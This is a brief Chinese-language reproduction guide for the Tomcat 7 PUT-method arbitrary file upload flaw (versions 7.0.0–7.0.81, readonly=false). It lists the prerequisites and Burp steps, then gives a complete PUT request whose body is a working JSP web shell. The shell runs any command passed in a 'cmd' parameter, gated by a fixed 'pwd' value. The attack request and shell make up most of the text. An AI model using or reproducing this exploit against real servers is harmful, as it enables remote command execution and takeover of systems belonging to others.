1、漏洞利用前提:
Tomcat版本: 7.0.0 - 7.0.81
配置文件conf/web.xml中的readonly设置为false
开启了PUT方法
2、复现过程:
用burp随意抓一个GET请求包,将GET改为PUT,并上传一个jsp文件
PUT /1.jsp/ HTTP/1.1
Host: 对应的网站host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("pwd".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println("hello");}%>